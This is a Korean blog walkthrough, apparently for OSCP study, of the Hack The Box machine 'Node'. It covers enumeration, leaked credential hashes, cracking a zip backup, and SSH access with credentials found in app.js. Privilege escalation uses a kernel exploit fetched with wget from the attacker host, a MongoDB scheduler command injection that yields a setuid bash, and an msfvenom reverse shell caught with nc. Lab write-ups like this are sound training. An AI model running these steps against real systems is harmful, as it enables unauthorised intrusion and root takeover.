1. SCANNING
┌──(root💀takudaddy)-[/htb/n]
└─# nmap -A -p- 10.10.10.58
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-24 16:56 KST
Nmap scan report for 10.10.10.58
Host is up (0.21s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2. WEB ENUMERATION
┌──(root💀takudaddy)-[/htb/n]
└─# gobuster dir -t 64 -u http://10.10.10.58:3000 -w /usr/share/wordlists/dirb/small.txt -s 200
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.58:3000
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/04/24 19:52:59 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing
urls. http://10.10.10.58:3000/f436f19b-c07a-4bd8-9a6d-64a2b270c2be => 200 (Length: 3861).
To continue please exclude the status code, the length or use the --wildcard switch
안되는데 뭐가 있음
dirbuster로 돌려보니 뭐가 확실히 있음
소스코드 하단에 참조하는 js 구문을 살펴보면
Bootstrap v.3.3.7 사용
/api/session
/api/user
유저 정보가 나옴
myP14ceAdm1nAcc0uNT : manchester
tom : spongebob
mark : snowflake
rastating : cat'n find
3. EXPLOITATION
받아보면
나머지 유저는 별거 없음
다운 받은 파일 캐보기
┌──(root💀takudaddy)-[/htb/n]
└─# ls
myplace.backup users.txt
┌──(root💀takudaddy)-[/htb/n]
└─# base64 -d myplace.backup > somefile
┌──(root💀takudaddy)-[/htb/n]
└─# file somefile
somefile: Zip archive data, at least v1.0 to extract
┌──(root💀takudaddy)-[/htb/n]
└─# mv somefile somefile.zip
┌──(root💀takudaddy)-[/htb/n]
└─# file somefile.zip
somefile.zip: Zip archive data, at least v1.0 to extract
┌──(root💀takudaddy)-[/htb/n]
└─# strings somefile.zip
r.woff2UT
var/www/myplace/static/vendor/bootstrap/js/UT
var/www/myplace/static/vendor/bootstrap/js/bootstrap.min.jsUT
var/www/myplace/static/vendor/bootstrap/js/bootstrap.jsUT
var/www/myplace/static/assets/UT
var/www/myplace/static/assets/css/UT
var/www/myplace/static/assets/css/freelancer.cssUT
var/www/myplace/static/assets/css/app.cssUT
var/www/myplace/static/assets/css/freelancer.min.cssUT
var/www/myplace/static/assets/js/UT
var/www/myplace/static/assets/js/misc/UT
var/www/myplace/static/assets/js/misc/freelancer.min.jsUT
var/www/myplace/static/assets/js/app/UT
..
┌──(root💀takudaddy)-[/htb/n]
└─# unzip somefile.zip
Archive: somefile.zip
creating: var/www/myplace/
[somefile.zip] var/www/myplace/package-lock.json password:
암호 크랙하기
┌──(root💀takudaddy)-[/htb/n]
└─# fcrackzip -uD -p /usr/share/wordlists/rockyou.txt somefile.zip
possible pw found: magicword ()
┌──(root💀takudaddy)-[/htb/n/var/www/myplace]
└─# unzip somefile.zip
Archive: somefile.zip
creating: var/www/myplace/
[somefile.zip] var/www/myplace/package-lock.json password: magicword
.....
flings-regular.woff
inflating: var/www/myplace/static/vendor/bootstrap/fonts/glyphicons-halflings-regular.woff2
creating: var/www/myplace/static/vendor/bootstrap/js/
inflating: var/www/myplace/static/vendor/bootstrap/js/bootstrap.min.js
inflating: var/www/myplace/static/vendor/bootstrap/js/bootstrap.js
creating: var/www/myplace/static/assets/
creating: var/www/myplace/static/assets/css/
inflating: var/www/myplace/static/assets/css/freelancer.css
inflating: var/www/myplace/static/assets/css/app.css
inflating: var/www/myplace/st
..
┌──(root💀takudaddy)-[/htb/n]
└─# ls
myplace.backup somefile.zip users.txt var
┌──(root💀takudaddy)-[/htb/n]
└─# cd var
┌──(root💀takudaddy)-[/htb/n/var]
└─# ls
www
┌──(root💀takudaddy)-[/htb/n/var]
└─# cd www
┌──(root💀takudaddy)-[/htb/n/var/www]
└─# ls
myplace
┌──(root💀takudaddy)-[/htb/n/var/www]
└─# cd myplace
┌──(root💀takudaddy)-[/htb/n/var/www/myplace]
└─# ls
app.html app.js node_modules package.json package-lock.json static
┌──(root💀takudaddy)-[/htb/n/var/www/myplace]
└─# cat app.js
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
....
mark : 5AYRft73VtFpc84k
┌──(root💀takudaddy)-[/htb/n/var/www/myplace]
└─# ssh mark@10.10.10.58
mark@10.10.10.58's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc//copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
.-.
.-'``(|||)
,`\ \ `-`. 88 88
/ \ '``-. ` 88 88
.-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
(:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
`-` ` , : 88 88 88 88 88 88 88 88 88 88 88
\ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
`./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'
`-..-( )
`-`
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$
침투 성공
4. POST EXPLOITATION & PRIVILEGE ESCALATION
간단한 방법
mark@node:~$ cd /tmp
mark@node:/tmp$ wget http://10.10.14.13/45010
--2021-04-24 14:10:43-- http://10.10.14.13/45010
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22264 (22K)
Saving to: ‘45010’
45010 100%[==================================>] 21.74K 105KB/s in 0.2s
2021-04-24 14:10:44 (105 KB/s) - ‘45010’ saved [22264/22264]
mark@node:/tmp$ chmod +x 45010
mark@node:/tmp$ ./45010
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880028853300
[*] Leaking sock struct from ffff88002569b000
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88002885e600
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff88002885e600
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),1001(mark)
# cat /root/root.txt
1722e99ca5f353b362556a62bd5e6be0
다른 방법
mark@node:~$ sudo -l
[sudo] password for mark:
Sorry, user mark may not run sudo on node.
mark@node:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
tom:x:1000:1000:tom,,,:/home/tom:/bin/bash
mongodb:x:111:65534::/home/mongodb:/bin/false
mark:x:1001:1001:Mark,,,:/home/mark:/bin/bash
mark@node:/etc/init.d$ find / -perm -u=s -exec ls -li {} \; 2>/dev/null
259267 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
297906 -rwsr-xr-x 1 root root 81672 Jul 17 2017 /usr/lib/snapd/snap-confine
278211 -rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
278959 -rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
17884 -rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign
282088 -rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
303364 -rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
258944 -rwsr-xr-x 1 root root 49584 May 17 2017 /usr/bin/chfn
281144 -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
259007 -rwsr-xr-x 1 root root 75304 May 17 2017 /usr/bin/gpasswd
279006 -rwsr-xr-x 1 root root 32944 May 17 2017 /usr/bin/newgidmap
258946 -rwsr-xr-x 1 root root 40432 May 17 2017 /usr/bin/chsh
259166 -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
282096 -rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
259071 -rwsr-xr-x 1 root root 39904 May 17 2017 /usr/bin/newgrp
259082 -rwsr-xr-x 1 root root 54256 May 17 2017 /usr/bin/passwd
279005 -rwsr-xr-x 1 root root 32944 May 17 2017 /usr/bin/newuidmap
258636 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
258671 -rwsr-xr-x 1 root root 27608 Jun 14 2017 /bin/umount
278644 -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
mark@node:/home/tom$ ps -ef
root 1231 1 0 09:00 ? 00:00:02 /usr/sbin/sshd -D
tom 1232 1 6 09:00 ? 00:19:48 /usr/bin/node /var/www/myplace/app.js
tom 1234 1 0 09:00 ? 00:00:03 /usr/bin/node /var/scheduler/app.js
mongodb 1239 1 0 09:00 ? 00:01:17 /usr/bin/mongod --auth --quiet --config /etc/mongod.c
root 1256 1 0 09:00 ? 00:00:00 /sbin/iscsid
root 1257 1 0 09:00 ? 00:00:01 /sbin/iscsid
root 1331 1 0 09:00 tty1 00:00:00 /sbin/agetty --noclear tty1 linux
root 1509 2 0 09:15 ? 00:00:00 [kworker/0:0]
root 10411 2 0 11:05 ? 00:00:00 [kworker/u2:2]
root 10415 2 0 11:31 ? 00:00:00 [kworker/u2:1]
root 10540 1231 0 14:04 ? 00:00:00 sshd: mark [priv]
mark 10542 1 0 14:04 ? 00:00:00 /lib/systemd/systemd --user
mark@node:/tmp$ ls -l /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
mark@node:/tmp$ top -u tom
top - 14:24:18 up 5:24, 1 user, load average: 0.00, 0.00, 0.00
Tasks: 159 total, 1 running, 158 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 758008 total, 52992 free, 192680 used, 512336 buff/cache
KiB Swap: 786428 total, 772024 free, 14404 used. 388616 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1232 tom 20 0 1042596 56900 22708 S 0.0 7.5 19:48.70 node
1234 tom 20 0 1008568 43660 22404 S 0.0 5.8 0:03.27 node
=>
tom 1232 1 6 09:00 ? 00:19:48 /usr/bin/node /var/www/myplace/app.js
tom 1234 1 0 09:00 ? 00:00:03 /usr/bin/node /var/scheduler/app.js
mark@node:/tmp$ ls -l /usr/bin/node
lrwxrwxrwx 1 root root 22 Aug 30 2017 /usr/bin/node -> /etc/alternatives/node
mark@node:/tmp$ file /etc/alternatives/node
/etc/alternatives/node: symbolic link to /usr/bin/nodejs
mark@node:/etc/init.d$ id tom
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),
115(lpadmin),116(sambashare),1002(admin)
mark@node:/tmp$ netstat -ltnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::3000 :::* LISTEN -
/usr/local/bin/backup에 setuid 걸려있고 root:admin
그런데 tom이 admin 권한을 갖고 있음
mongodb 공격 구문
mark@node:/tmp$ mongo scheduler -u mark -p
MongoDB shell version: 3.2.16
Enter password:
connecting to: scheduler
> db.tasks.insert({"cmd" : "cd /tmp ; cp /bin/bash . ; chown tom:admin -R ./* ; chmod 6755 ./*"})
WriteResult({ "nInserted" : 1 })
> ^C
bye
mark@node:/tmp$ ls -l
total 1052
-rwxrwxr-x 1 mark mark 22264 Apr 19 07:59 45010
-rwsr-sr-x 1 tom admin 1037528 Apr 24 14:57 bash
srwx------ 1 mongodb nogroup 0 Apr 24 09:00 mongodb-27017.sock
drwx------ 3 root root 4096 Apr 24 09:00 systemd-private-44e7a7f0f66249d296999aeb0120ea36-systemd-timesyncd.service-zDjYFb
drwx------ 2 root root 4096 Apr 24 09:00 vmware-root
mark@node:/tmp$ ./bash
bash-4.3$ exit
exit
mark@node:/tmp$ ./bash -p
bash-4.3$ id
uid=1001(mark) gid=1001(mark) euid=1000(tom) egid=1002(admin) groups=1002(admin),1001(mark)
bash-4.3$
다른방법 (리버스 쉘 실행)
공격 서버에서 페이로드 생성 후 넘기고 리스너 기동
┌──(root💀takudaddy)-[/htb/n]
└─# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.13 LPORT=7979 -f elf > scpshell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
┌──(root💀takudaddy)-[/htb/n]
└─# scp scpshell.elf mark@10.10.10.58:/tmp/attack.elf
mark@10.10.10.58's password:
scpshell.elf 100% 152 0.7KB/s 00:00
┌──(root💀takudaddy)-[/htb/n]
└─# nc -lvnp 7979
listening on [any] 7979 ...
침투서버에서 권한 주고 mongodb 접속해 파일 실행
mark@node:/tmp$ chmod +x attack.elf
mark@node:/tmp$ ls
45010
attack.elf
mongodb-27017.sock
systemd-private-44e7a7f0f66249d296999aeb0120ea36-systemd-timesyncd.service-zDjYFb
vmware-root
mark@node:/tmp$ mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler
MongoDB shell version: 3.2.16
connecting to: localhost:27017/scheduler
> use scheduler
switched to db scheduler
> show collections
tasks
> db.tasks.insertOne({cmd:'/tmp/attack.elf'})
{
"acknowledged" : true,
"insertedId" : ObjectId("60842141833599628572cd95")
}
접속됨
┌──(root💀takudaddy)-[/htb/n]
└─# nc -lvnp 7979 1 ⨯
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.58] 45390
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),
115(lpadmin),116(sambashare),1002(admin)
id는 mark지만 admin 그룹 권한을 얻음.
bash-4.3$ ls -l /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
bash-4.3$ strings /usr/local/bin/backup
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
strcpy
exit
sprintf
srand
fopen
strncpy
puts
time
clock
getpid
fgets
strstr
strcspn
fclose
strcat
remove
system
geteuid
strchr
access
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
WVSQ
Y[^_]
UWVS
t$,U
[^_]
[37m
[33m
%s[!]%s %s
[32m
%s[+]%s %s
%s[+]%s Starting archiving %s
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | Secure Backup v1.0 | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
Could not open file
Validated access token
Ah-ah-ah! You didn't say the magic word!
Finished! Encoded backup is below:
UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
/root
/etc
/tmp/.backup_%i
/usr/bin/zip -r -P magicword %s %s > /dev/null
/usr/bin/base64 -w0 %s
The target path doesn't exist
;*2$"
728x90
반응형
'OSCP > HacktheBox' 카테고리의 다른 글
| 16. Love (0) | 2021.07.21 |
|---|---|
| 15. Armageddon (0) | 2021.07.20 |
| 13. Solid State (0) | 2021.04.24 |
| 12. Nineveh (0) | 2021.04.23 |
| 11. Brainfuck (0) | 2021.04.22 |